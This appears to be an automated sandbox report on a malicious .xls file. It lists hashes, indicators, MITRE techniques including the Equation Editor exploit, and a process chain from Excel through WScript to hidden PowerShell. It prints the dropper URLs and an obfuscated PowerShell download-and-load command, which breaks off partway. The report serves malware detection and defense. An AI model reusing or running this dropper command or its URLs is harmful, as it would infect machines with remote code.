a3ad446626bebe8f644aecc09a0d37995db5519c579d3930ac045a5a45c05692

Analysis

max time kernel
144s
max time network
124s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
18-08-2024 01:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a3ad446626bebe8f644aecc09a0d37995db5519c579d3930ac045a5a45c05692.xls
Size

165KB
MD5

2fee83fc2c5af9605530ce72a97a9c7b
SHA1

dfeed802de1f062c3a3fdd36a529d86772db6005
SHA256

a3ad446626bebe8f644aecc09a0d37995db5519c579d3930ac045a5a45c05692
SHA512

2614fafe15ad2198fd3bb524d26b959b7c8de3becdf547dddaf2879d72e7c412beea2723b9882e6bf511d265483e14316596ef943133a59f47c97fa84424cd4a
SSDEEP

3072:jUYpmZjeGXnuqKfMMVG+MhD1e5pzYJIjB0ssuyg6kB3f8:AY0Tif7G+MhE30Ojp0grBv8

Score

10^/10

discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg

exe.dropper

https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
17	1744	EQNEDT32.EXE
19	904	powershell.exe
20	904	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1056	powershell.exe
904	powershell.exe

Abuses OpenXML format to download file from external location 2 IoCs

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Office\Common\Offline\Files\https://ir.cx/LWFpC	WINWORD.EXE

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EQNEDT32.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Launches Equation Editor 1 TTPs 1 IoCs

Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

exploit

Exploitation for Client Execution

T1203

pid	Process
1744	EQNEDT32.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2180	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1056	powershell.exe
904	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	1056	powershell.exe
Token: SeDebugPrivilege	904	powershell.exe
Token: SeShutdownPrivilege	1636	WINWORD.EXE

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
2180	EXCEL.EXE
2180	EXCEL.EXE
2180	EXCEL.EXE
1636	WINWORD.EXE
1636	WINWORD.EXE

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 1744 wrote to memory of 2380	1744	EQNEDT32.EXE	34
PID 1744 wrote to memory of 2380	1744	EQNEDT32.EXE	34
PID 1744 wrote to memory of 2380	1744	EQNEDT32.EXE	34
PID 1744 wrote to memory of 2380	1744	EQNEDT32.EXE	34
PID 1636 wrote to memory of 2912	1636	WINWORD.EXE	35
PID 1636 wrote to memory of 2912	1636	WINWORD.EXE	35
PID 1636 wrote to memory of 2912	1636	WINWORD.EXE	35
PID 1636 wrote to memory of 2912	1636	WINWORD.EXE	35
PID 2380 wrote to memory of 1056	2380	WScript.exe	36
PID 2380 wrote to memory of 1056	2380	WScript.exe	36
PID 2380 wrote to memory of 1056	2380	WScript.exe	36
PID 2380 wrote to memory of 1056	2380	WScript.exe	36
PID 1056 wrote to memory of 904	1056	powershell.exe	38
PID 1056 wrote to memory of 904	1056	powershell.exe	38
PID 1056 wrote to memory of 904	1056	powershell.exe	38
PID 1056 wrote to memory of 904	1056	powershell.exe	38

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\a3ad446626bebe8f644aecc09a0d37995db5519c579d3930ac045a5a45c05692.xls
1⤵
- Abuses OpenXML format to download file from external location
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2180

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding
1⤵
- Abuses OpenXML format to download file from external location
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1636
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:2912

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:1744
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\pictgrowingbuttersmoothgoo.vBS"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2380
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J㌟ ⥜ ㈄ ꒱ ௴Bp㌟ ⥜ ㈄ ꒱ ௴G0㌟ ⥜ ㈄ ꒱ ௴YQBn㌟ ⥜ ㈄ ꒱ ௴GU㌟ ⥜ ㈄ ꒱ ௴VQBy㌟ ⥜ ㈄ ꒱ ௴Gw㌟ ⥜ ㈄ ꒱ ௴I㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴9㌟ ⥜ ㈄ ꒱ ௴C㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴JwBo㌟ ⥜ ㈄ ꒱ ௴HQ㌟ ⥜ ㈄ ꒱ ௴d㌟ ⥜ ㈄ ꒱ ௴Bw㌟ ⥜ ㈄ ꒱ ௴HM㌟ ⥜ ㈄ ꒱ ௴Og㌟ ⥜ ㈄ ꒱ ௴v㌟ ⥜ ㈄ ꒱ ௴C8㌟ ⥜ ㈄ ꒱ ௴aQBh㌟ ⥜ ㈄ ꒱ ௴Dg㌟ ⥜ ㈄ ꒱ ௴M㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴z㌟ ⥜ ㈄ ꒱ ௴DE㌟ ⥜ ㈄ ꒱ ௴M㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴0㌟ ⥜ ㈄ ꒱ ௴C4㌟ ⥜ ㈄ ꒱ ௴dQBz㌟ ⥜ ㈄ ꒱ ௴C4㌟ ⥜ ㈄ ꒱ ௴YQBy㌟ ⥜ ㈄ ꒱ ௴GM㌟ ⥜ ㈄ ꒱ ௴a㌟ ⥜ ㈄ ꒱ ௴Bp㌟ ⥜ ㈄ ꒱ ௴HY㌟ ⥜ ㈄ ꒱ ௴ZQ㌟ ⥜ ㈄ ꒱ ௴u㌟ ⥜ ㈄ ꒱ ௴G8㌟ ⥜ ㈄ ꒱ ௴cgBn㌟ ⥜ ㈄ ꒱ ௴C8㌟ ⥜ ㈄ ꒱ ௴Mg㌟ ⥜ ㈄ ꒱ ௴3㌟ ⥜ ㈄ ꒱ ௴C8㌟ ⥜ ㈄ ꒱ ௴aQB0㌟ ⥜ ㈄ ꒱ ௴GU㌟ ⥜ ㈄ ꒱ ௴bQBz㌟ ⥜ ㈄ ꒱ ௴C8㌟ ⥜ ㈄ ꒱ ௴dgBi㌟ ⥜ ㈄ ꒱ ௴HM㌟ ⥜ ㈄ ꒱ ௴Xw㌟ ⥜ ㈄ ꒱ ௴y㌟ ⥜ ㈄ ꒱ ௴D㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴Mg㌟ ⥜ ㈄ ꒱ ௴0㌟ ⥜ ㈄ ꒱ ௴D㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴Nw㌟ ⥜ ㈄ ꒱ ௴y㌟ ⥜ ㈄ ꒱ ௴DY㌟ ⥜ ㈄ ꒱ ௴Xw㌟ ⥜ ㈄ ꒱ ௴y㌟ ⥜ ㈄ ꒱ ௴D㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴Mg㌟ ⥜ ㈄ ꒱ ௴0㌟ ⥜ ㈄ ꒱ ௴D㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴Nw㌟ ⥜ ㈄ ꒱ ௴y㌟ ⥜ ㈄ ꒱ ௴DY㌟ ⥜ ㈄ ꒱ ௴LwB2㌟ ⥜ ㈄ ꒱ ௴GI㌟ ⥜ ㈄ ꒱ ௴cw㌟ ⥜ ㈄ ꒱ ௴u㌟ ⥜ ㈄ ꒱ ௴Go㌟ ⥜ ㈄ ꒱ ௴c㌟ ⥜ ㈄ ꒱ ௴Bn㌟ ⥜ ㈄ ꒱ ௴Cc㌟ ⥜ ㈄ ꒱ ௴Ow㌟ ⥜ ㈄ ꒱ ௴k㌟ ⥜ ㈄ ꒱ ௴Hc㌟ ⥜ ㈄ ꒱ ௴ZQBi㌟ ⥜ ㈄ ꒱ ௴EM㌟ ⥜ ㈄ ꒱ ௴b㌟ ⥜ ㈄ ꒱ ௴Bp㌟ ⥜ ㈄ ꒱ ௴GU㌟ ⥜ ㈄ ꒱ ௴bgB0㌟ ⥜ ㈄ ꒱ ௴C㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴PQ㌟ ⥜ ㈄ ꒱ ௴g㌟ ⥜ ㈄ ꒱ ௴E4㌟ ⥜ ㈄ ꒱ ௴ZQB3㌟ ⥜ ㈄ ꒱ ௴C0㌟ ⥜ ㈄ ꒱ ௴TwBi㌟ ⥜ ㈄ ꒱ ௴Go㌟ ⥜ ㈄ ꒱ ௴ZQBj㌟ ⥜ ㈄ ꒱ ௴HQ㌟ ⥜ ㈄ ꒱ ௴I㌟ ⥜ ㈄ ꒱ ௴BT㌟ ⥜ ㈄ ꒱ ௴Hk㌟ ⥜ ㈄ ꒱ ௴cwB0㌟ ⥜ ㈄ ꒱ ௴GU㌟ ⥜ ㈄ ꒱ ௴bQ㌟ ⥜ ㈄ ꒱ ௴u㌟ ⥜ ㈄ ꒱ ௴E4㌟ ⥜ ㈄ ꒱ ௴ZQB0㌟ ⥜ ㈄ ꒱ ௴C4㌟ ⥜ ㈄ ꒱ ௴VwBl㌟ ⥜ ㈄ ꒱ ௴GI㌟ ⥜ ㈄ ꒱ ௴QwBs㌟ ⥜ ㈄ ꒱ ௴Gk㌟ ⥜ ㈄ ꒱ ௴ZQBu㌟ ⥜ ㈄ ꒱ ௴HQ㌟ ⥜ ㈄ ꒱ ௴Ow㌟ ⥜ ㈄ ꒱ ௴k㌟ ⥜ ㈄ ꒱ ௴Gk㌟ ⥜ ㈄ ꒱ ௴bQBh㌟ ⥜ ㈄ ꒱ ௴Gc㌟ ⥜ ㈄ ꒱ ௴ZQBC㌟ ⥜ ㈄ ꒱ ௴Hk㌟ ⥜ ㈄ ꒱ ௴d㌟ ⥜ ㈄ ꒱ ௴Bl㌟ ⥜ ㈄ ꒱ ௴HM㌟ ⥜ ㈄ ꒱ ௴I㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴9㌟ ⥜ ㈄ ꒱ ௴C㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴J㌟ ⥜ ㈄ ꒱ ௴B3㌟ ⥜ ㈄ ꒱ ௴GU㌟ ⥜ ㈄ ꒱ ௴YgBD㌟ ⥜ ㈄ ꒱ ௴Gw㌟ ⥜ ㈄ ꒱ ௴aQBl㌟ ⥜ ㈄ ꒱ ௴G4㌟ ⥜ ㈄ ꒱ ௴d㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴u㌟ ⥜ ㈄ ꒱ ௴EQ㌟ ⥜ ㈄ ꒱ ௴bwB3㌟ ⥜ ㈄ ꒱ ௴G4㌟ ⥜ ㈄ ꒱ ௴b㌟ ⥜ ㈄ ꒱ ௴Bv㌟ ⥜ ㈄ ꒱ ௴GE㌟ ⥜ ㈄ ꒱ ௴Z㌟ ⥜ ㈄ ꒱ ௴BE㌟ ⥜ ㈄ ꒱ ௴GE㌟ ⥜ ㈄ ꒱ ௴d㌟ ⥜ ㈄ ꒱ ௴Bh㌟ ⥜ ㈄ ꒱ ௴Cg㌟ ⥜ ㈄ ꒱ ௴J㌟ ⥜ ㈄ ꒱ ௴Bp㌟ ⥜ ㈄ ꒱ ௴G0㌟ ⥜ ㈄ ꒱ ௴YQBn㌟ ⥜ ㈄ ꒱ ௴GU㌟ ⥜ ㈄ ꒱ ௴VQBy㌟ ⥜ ㈄ ꒱ ௴Gw㌟ ⥜ ㈄ ꒱ ௴KQ㌟ ⥜ ㈄ ꒱ ௴7㌟ ⥜ ㈄ ꒱ ௴CQ㌟ ⥜ ㈄ ꒱ ௴aQBt㌟ ⥜ ㈄ ꒱ ௴GE㌟ ⥜ ㈄ ꒱ ௴ZwBl㌟ ⥜ ㈄ ꒱ ௴FQ㌟ ⥜ ㈄ ꒱ ௴ZQB4㌟ ⥜ ㈄ ꒱ ௴HQ㌟ ⥜ ㈄ ꒱ ௴I㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴9㌟ ⥜ ㈄ ꒱ ௴C㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴WwBT㌟ ⥜ ㈄ ꒱ ௴Hk㌟ ⥜ ㈄ ꒱ ௴cwB0㌟ ⥜ ㈄ ꒱ ௴GU㌟ ⥜ ㈄ ꒱ ௴bQ㌟ ⥜ ㈄ ꒱ ௴u㌟ ⥜ ㈄ ꒱ ௴FQ㌟ ⥜ ㈄ ꒱ ௴ZQB4㌟ ⥜ ㈄ ꒱ ௴HQ㌟ ⥜ ㈄ ꒱ ௴LgBF㌟ ⥜ ㈄ ꒱ ௴G4㌟ ⥜ ㈄ ꒱ ௴YwBv㌟ ⥜ ㈄ ꒱ ௴GQ㌟ ⥜ ㈄ ꒱ ௴aQBu㌟ ⥜ ㈄ ꒱ ௴Gc㌟ ⥜ ㈄ ꒱ ௴XQ㌟ ⥜ ㈄ ꒱ ௴6㌟ ⥜ ㈄ ꒱ ௴Do㌟ ⥜ ㈄ ꒱ ௴VQBU㌟ ⥜ ㈄ ꒱ ௴EY㌟ ⥜ ㈄ ꒱ ௴O㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴u㌟ ⥜ ㈄ ꒱ ௴Ec㌟ ⥜ ㈄ ꒱ ௴ZQB0㌟ ⥜ ㈄ ꒱ ௴FM㌟ ⥜ ㈄ ꒱ ௴d㌟ ⥜ ㈄ ꒱ ௴By㌟ ⥜ ㈄ ꒱ ௴Gk㌟ ⥜ ㈄ ꒱ ௴bgBn㌟ ⥜ ㈄ ꒱ ௴Cg㌟ ⥜ ㈄ ꒱ ௴J㌟ ⥜ ㈄ ꒱ ௴Bp㌟ ⥜ ㈄ ꒱ ௴G0㌟ ⥜ ㈄ ꒱ ௴YQBn㌟ ⥜ ㈄ ꒱ ௴GU㌟ ⥜ ㈄ ꒱ ௴QgB5㌟ ⥜ ㈄ ꒱ ௴HQ㌟ ⥜ ㈄ ꒱ ௴ZQBz㌟ ⥜ ㈄ ꒱ ௴Ck㌟ ⥜ ㈄ ꒱ ௴Ow㌟ ⥜ ㈄ ꒱ ௴k㌟ ⥜ ㈄ ꒱ ௴HM㌟ ⥜ ㈄ ꒱ ௴d㌟ ⥜ ㈄ ꒱ ௴Bh㌟ ⥜ ㈄ ꒱ ௴HI㌟ ⥜ ㈄ ꒱ ௴d㌟ ⥜ ㈄ ꒱ ௴BG㌟ ⥜ ㈄ ꒱ ௴Gw㌟ ⥜ ㈄ ꒱ ௴YQBn㌟ ⥜ ㈄ ꒱ ௴C㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴PQ㌟ ⥜ ㈄ ꒱ ௴g㌟ ⥜ ㈄ ꒱ ௴Cc㌟ ⥜ ㈄ ꒱ ௴P㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴8㌟ ⥜ ㈄ ꒱ ௴EI㌟ ⥜ ㈄ ꒱ ௴QQBT㌟ ⥜ ㈄ ꒱ ௴EU㌟ ⥜ ㈄ ꒱ ௴Ng㌟ ⥜ ㈄ ꒱ ௴0㌟ ⥜ ㈄ ꒱ ௴F8㌟ ⥜ ㈄ ꒱ ௴UwBU㌟ ⥜ ㈄ ꒱ ௴EE㌟ ⥜ ㈄ ꒱ ௴UgBU㌟ ⥜ ㈄ ꒱ ௴D4㌟ ⥜ ㈄ ꒱ ௴Pg㌟ ⥜ ㈄ ꒱ ௴n㌟ ⥜ ㈄ ꒱ ௴Ds㌟ ⥜ ㈄ ꒱ ௴J㌟ ⥜ ㈄ ꒱ ௴Bl㌟ ⥜ ㈄ ꒱ ௴G4㌟ ⥜ ㈄ ꒱ ௴Z㌟ ⥜ ㈄ ꒱ ௴BG㌟ ⥜ ㈄ ꒱ ௴Gw㌟ ⥜ ㈄ ꒱ ௴YQBn㌟ ⥜ ㈄ ꒱ ௴C㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴PQ㌟ ⥜ ㈄ ꒱ ௴g㌟ ⥜ ㈄ ꒱ ௴Cc㌟ ⥜ ㈄ ꒱ ௴P㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴8㌟ ⥜ ㈄ ꒱ ௴EI㌟ ⥜ ㈄ ꒱ ௴QQBT㌟ ⥜ ㈄ ꒱ ௴EU㌟ ⥜ ㈄ ꒱ ௴Ng㌟ ⥜ ㈄ ꒱ ௴0㌟ ⥜ ㈄ ꒱ ௴F8㌟ ⥜ ㈄ ꒱ ௴RQBO㌟ ⥜ ㈄ ꒱ ௴EQ㌟ ⥜ ㈄ ꒱ ௴Pg㌟ ⥜ ㈄ ꒱ ௴+㌟ ⥜ ㈄ ꒱ ௴Cc㌟ ⥜ ㈄ ꒱ ௴Ow㌟ ⥜ ㈄ ꒱ ௴k㌟ ⥜ ㈄ ꒱ ௴HM㌟ ⥜ ㈄ ꒱ ௴d㌟ ⥜ ㈄ ꒱ ௴Bh㌟ ⥜ ㈄ ꒱ ௴HI㌟ ⥜ ㈄ ꒱ ௴d㌟ ⥜ ㈄ ꒱ ௴BJ㌟ ⥜ ㈄ ꒱ ௴G4㌟ ⥜ ㈄ ꒱ ௴Z㌟ ⥜ ㈄ ꒱ ௴Bl㌟ ⥜ ㈄ ꒱ ௴Hg㌟ ⥜ ㈄ ꒱ ௴I㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴9㌟ ⥜ ㈄ ꒱ ௴C㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴J㌟ ⥜ ㈄ ꒱ ௴Bp㌟ ⥜ ㈄ ꒱ ௴G0㌟ ⥜ ㈄ ꒱ ௴YQBn㌟ ⥜ ㈄ ꒱ ௴GU㌟ ⥜ ㈄ ꒱ ௴V㌟ ⥜ ㈄ ꒱ ௴Bl㌟ ⥜ ㈄ ꒱ ௴Hg㌟ ⥜ ㈄ ꒱ ௴d㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴u㌟ ⥜ ㈄ ꒱ ௴Ek㌟ ⥜ ㈄ ꒱ ௴bgBk㌟ ⥜ ㈄ ꒱ ௴GU㌟ ⥜ ㈄ ꒱ ௴e㌟ ⥜ ㈄ ꒱ ௴BP㌟ ⥜ ㈄ ꒱ ௴GY㌟ ⥜ ㈄ ꒱ ௴K㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴k㌟ ⥜ ㈄ ꒱ ௴HM㌟ ⥜ ㈄ ꒱ ௴d㌟ ⥜ ㈄ ꒱ ௴Bh㌟ ⥜ ㈄ ꒱ ௴HI㌟ ⥜ ㈄ ꒱ ௴d㌟ ⥜ ㈄ ꒱ ௴BG㌟ ⥜ ㈄ ꒱ ௴Gw㌟ ⥜ ㈄ ꒱ ௴YQBn㌟ ⥜ ㈄ ꒱ ௴Ck㌟ ⥜ ㈄ ꒱ ௴Ow㌟ ⥜ ㈄ ꒱ ௴k㌟ ⥜ ㈄ ꒱ ௴GU㌟ ⥜ ㈄ ꒱ ௴bgBk㌟ ⥜ ㈄ ꒱ ௴Ek㌟ ⥜ ㈄ ꒱ ௴bgBk㌟ ⥜ ㈄ ꒱ ௴GU㌟ ⥜ ㈄ ꒱ ௴e㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴g㌟ ⥜ ㈄ ꒱ ௴D0㌟ ⥜ ㈄ ꒱ ௴I㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴k㌟ ⥜ ㈄ ꒱ ௴Gk㌟ ⥜ ㈄ ꒱ ௴bQBh㌟ ⥜ ㈄ ꒱ ௴Gc㌟ ⥜ ㈄ ꒱ ௴ZQBU㌟ ⥜ ㈄ ꒱ ௴GU㌟ ⥜ ㈄ ꒱ ௴e㌟ ⥜ ㈄ ꒱ ௴B0㌟ ⥜ ㈄ ꒱ ௴C4㌟ ⥜ ㈄ ꒱ ௴SQBu㌟ ⥜ ㈄ ꒱ ௴GQ㌟ ⥜ ㈄ ꒱ ௴ZQB4㌟ ⥜ ㈄ ꒱ ௴E8㌟ ⥜ ㈄ ꒱ ௴Zg㌟ ⥜ ㈄ ꒱ ௴o㌟ ⥜ ㈄ ꒱ ௴CQ㌟ ⥜ ㈄ ꒱ ௴ZQBu㌟ ⥜ ㈄ ꒱ ௴GQ㌟ ⥜ ㈄ ꒱ ௴RgBs㌟ ⥜ ㈄ ꒱ ௴GE㌟ ⥜ ㈄ ꒱ ௴Zw㌟ ⥜ ㈄ ꒱ ௴p㌟ ⥜ ㈄ ꒱ ௴Ds㌟ ⥜ ㈄ ꒱ ௴J㌟ ⥜ ㈄ ꒱ ௴Bz㌟ ⥜ ㈄ ꒱ ௴HQ㌟ ⥜ ㈄ ꒱ ௴YQBy㌟ ⥜ ㈄ ꒱ ௴HQ㌟ ⥜ ㈄ ꒱ ௴SQBu㌟ ⥜ ㈄ ꒱ ௴GQ㌟ ⥜ ㈄ ꒱ ௴ZQB4㌟ ⥜ ㈄ ꒱ ௴C㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴LQBn㌟ ⥜ ㈄ ꒱ ௴GU㌟ ⥜ ㈄ ꒱ ௴I㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴w㌟ ⥜ ㈄ ꒱ ௴C㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴LQBh㌟ ⥜ ㈄ ꒱ ௴G4㌟ ⥜ ㈄ ꒱ ௴Z㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴g㌟ ⥜ ㈄ ꒱ ௴CQ㌟ ⥜ ㈄ ꒱ ௴ZQBu㌟ ⥜ ㈄ ꒱ ௴GQ㌟ ⥜ ㈄ ꒱ ௴SQBu㌟ ⥜ ㈄ ꒱ ௴GQ㌟ ⥜ ㈄ ꒱ ௴ZQB4㌟ ⥜ ㈄ ꒱ ௴C㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴LQBn㌟ ⥜ ㈄ ꒱ ௴HQ㌟ ⥜ ㈄ ꒱ ௴I㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴k㌟ ⥜ ㈄ ꒱ ௴HM㌟ ⥜ ㈄ ꒱ ௴d㌟ ⥜ ㈄ ꒱ ௴Bh㌟ ⥜ ㈄ ꒱ ௴HI㌟ ⥜ ㈄ ꒱ ௴d㌟ ⥜ ㈄ ꒱ ௴BJ㌟ ⥜ ㈄ ꒱ ௴G4㌟ ⥜ ㈄ ꒱ ௴Z㌟ ⥜ ㈄ ꒱ ௴Bl㌟ ⥜ ㈄ ꒱ ௴Hg㌟ ⥜ ㈄ ꒱ ௴Ow㌟ ⥜ ㈄ ꒱ ௴k㌟ ⥜ ㈄ ꒱ ௴HM㌟ ⥜ ㈄ ꒱ ௴d㌟ ⥜ ㈄ ꒱ ௴Bh㌟ ⥜ ㈄ ꒱ ௴HI㌟ ⥜ ㈄ ꒱ ௴d㌟ ⥜ ㈄ ꒱ ௴BJ㌟ ⥜ ㈄ ꒱ ௴G4㌟ ⥜ ㈄ ꒱ ௴Z㌟ ⥜ ㈄ ꒱ ௴Bl㌟ ⥜ ㈄ ꒱ ௴Hg㌟ ⥜ ㈄ ꒱ ௴I㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴r㌟ ⥜ ㈄ ꒱ ௴D0㌟ ⥜ ㈄ ꒱ ௴I㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴k㌟ ⥜ ㈄ ꒱ ௴HM㌟ ⥜ ㈄ ꒱ ௴d㌟ ⥜ ㈄ ꒱ ௴Bh㌟ ⥜ ㈄ ꒱ ௴HI㌟ ⥜ ㈄ ꒱ ௴d㌟ ⥜ ㈄ ꒱ ௴BG㌟ ⥜ ㈄ ꒱ ௴Gw㌟ ⥜ ㈄ ꒱ ௴YQBn㌟ ⥜ ㈄ ꒱ ௴C4㌟ ⥜ ㈄ ꒱ ௴T㌟ ⥜ ㈄ ꒱ ௴Bl㌟ ⥜ ㈄ ꒱ ௴G4㌟ ⥜ ㈄ ꒱ ௴ZwB0㌟ ⥜ ㈄ ꒱ ௴Gg㌟ ⥜ ㈄ ꒱ ௴Ow㌟ ⥜ ㈄ ꒱ ௴k㌟ ⥜ ㈄ ꒱ ௴GI㌟ ⥜ ㈄ ꒱ ௴YQBz㌟ ⥜ ㈄ ꒱ ௴GU㌟ ⥜ ㈄ ꒱ ௴Ng㌟ ⥜ ㈄ ꒱ ௴0㌟ ⥜ ㈄ ꒱ ௴Ew㌟ ⥜ ㈄ ꒱ ௴ZQBu㌟ ⥜ ㈄ ꒱ ௴Gc㌟ ⥜ ㈄ ꒱ ௴d㌟ ⥜ ㈄ ꒱ ௴Bo㌟ ⥜ ㈄ ꒱ ௴C㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴PQ㌟ ⥜ ㈄ ꒱ ௴g㌟ ⥜ ㈄ ꒱ ௴CQ㌟ ⥜ ㈄ ꒱ ௴ZQBu㌟ ⥜ ㈄ ꒱ ௴GQ㌟ ⥜ ㈄ ꒱ ௴SQBu㌟ ⥜ ㈄ ꒱ ௴GQ㌟ ⥜ ㈄ ꒱ ௴ZQB4㌟ ⥜ ㈄ ꒱ ௴C㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴LQ㌟ ⥜ ㈄ ꒱ ௴g㌟ ⥜ ㈄ ꒱ ௴CQ㌟ ⥜ ㈄ ꒱ ௴cwB0㌟ ⥜ ㈄ ꒱ ௴GE㌟ ⥜ ㈄ ꒱ ௴cgB0㌟ ⥜ ㈄ ꒱ ௴Ek㌟ ⥜ ㈄ ꒱ ௴bgBk㌟ ⥜ ㈄ ꒱ ௴GU㌟ ⥜ ㈄ ꒱ ௴e㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴7㌟ ⥜ ㈄ ꒱ ௴CQ㌟ ⥜ ㈄ ꒱ ௴YgBh㌟ ⥜ ㈄ ꒱ ௴HM㌟ ⥜ ㈄ ꒱ ௴ZQ㌟ ⥜ ㈄ ꒱ ௴2㌟ ⥜ ㈄ ꒱ ௴DQ㌟ ⥜ ㈄ ꒱ 